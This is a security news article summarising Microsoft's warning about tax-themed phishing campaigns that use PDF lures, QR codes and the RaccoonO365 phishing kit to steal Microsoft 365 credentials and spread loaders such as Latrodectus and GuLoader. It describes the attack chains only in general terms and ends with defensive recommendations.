Microsoft Warns of Tax-Themed Phishing Campaigns Deploying Malware and Credential Theft Tools

As tax season approaches, Microsoft is raising alarms over a series of sophisticated phishing campaigns that exploit tax-related themes to distribute malware, steal credentials, and gain unauthorized access to corporate environments. These attacks use clever redirection methods, legitimate services, and phishing-as-a-service (PhaaS) platforms to evade detection.

Campaign Overview: Tax Season as a Cybercrime Opportunity

The latest campaigns identified by Microsoft utilize PDF attachments, URL shorteners, and QR codes to lure victims into visiting phishing websites. These pages are often delivered through a platform dubbed RaccoonO365, a PhaaS service first identified in December 2024. It is designed to mimic Microsoft 365 login pages, tricking users into entering their real credentials.

In addition to phishing, attackers are also deploying malware such as:

• Remcos RAT

• Latrodectus

• AHKBot

• GuLoader

• BruteRatel C4 (BRc4)

Notable Campaigns and Tactics

Campaign 1: Fake DocuSign and Remote Malware Deployment

On February 6, 2025, Microsoft observed a campaign targeting hundreds of U.S.-based users, using PDF attachments to redirect victims to fake DocuSign pages via shortened URLs (e.g., Rebrandly). If the user clicked the link and passed filtering checks based on system or IP address, they were served a JavaScript file, which downloaded:

• A Microsoft Software Installer (MSI) file

• The BruteRatel framework

• Follow-up Latrodectus malware

If the user did not meet criteria for further infection, a benign PDF was delivered instead.

This activity has been attributed to Storm-0249, a known initial access broker previously associated with malware families like Emotet, IcedID, BazaLoader, and Bumblebee.

Campaign 2: QR Code-Based Phishing at Scale

Between February 12 and 28, 2025, Microsoft observed another wave of phishing emails targeting over 2,300 organizations across engineering, IT, and consulting sectors. These emails contained:

• No text in the body

• A PDF attachment with a QR code

• Links to phishing pages hosted on RaccoonO365

The aim: harvest Microsoft 365 credentials through realistic login page clones.

Expanding Threats: AHKBot and GuLoader

Additional tax-themed phishing emails are delivering other malware strains like AHKBot and GuLoader:

• AHKBot Campaign: Redirects users to a malicious Excel file requiring macro activation. If enabled, the file downloads a MSI payload that launches an AutoHotKey script, followed by:

  • A Screenshotter module

  • Exfiltration of screenshots to a remote server

• GuLoader Campaign: Sends PDF attachments containing URLs that download a ZIP file with .lnk (shortcut) files posing as tax documents. These files:

  • Launch PowerShell

  • Download a PDF and BAT file

  • Install GuLoader, which drops Remcos RAT

Related Activity: Fake Windows Installers and Social Engineering

Recent reports also reveal:

• Fake Windows 11 Pro downloads using Facebook ads, leading to Latrodectus and BRc4

• New Latrodectus 1.9 variant with scheduled tasks and improved command execution

• Use of QR codes and open redirect links to obscure phishing URLs

• Exploitation of trusted services (e.g., Dropbox, DocuSign, Canva, Zoho) to evade email security

Broader Trends: Phishing Innovation Across Platforms

In recent weeks, threat actors have employed a variety of tactics, including:

• Browser-in-the-Browser (BitB) attacks to harvest Steam credentials

• SVG-based emails to bypass spam filters

• Impersonation of music services like Spotify and Apple Music

• Fake security alerts to trick users into revealing system credentials

• Trojanized software installers distributing Gh0st RAT and DarkCloud

• Localized banking-themed phishing targeting companies in Romania and Spain

How to Stay Protected

To defend against these evolving threats, Microsoft and cybersecurity experts recommend:

• Implementing phishing-resistant authentication, such as FIDO2 keys or certificate-based logins

• Using modern browsers with phishing protection features

• Blocking access to known malicious domains via DNS filtering or endpoint protection

• Training users to identify suspicious links, QR codes, and file attachments

• Monitoring for unusual login activity across Microsoft 365 and other platforms

Final Thoughts

As attackers continue to weaponize tax season, the use of PhaaS platforms, social engineering, and malware loaders poses a significant risk to organizations. By adopting modern security practices and remaining vigilant, businesses can better defend against these highly targeted campaigns.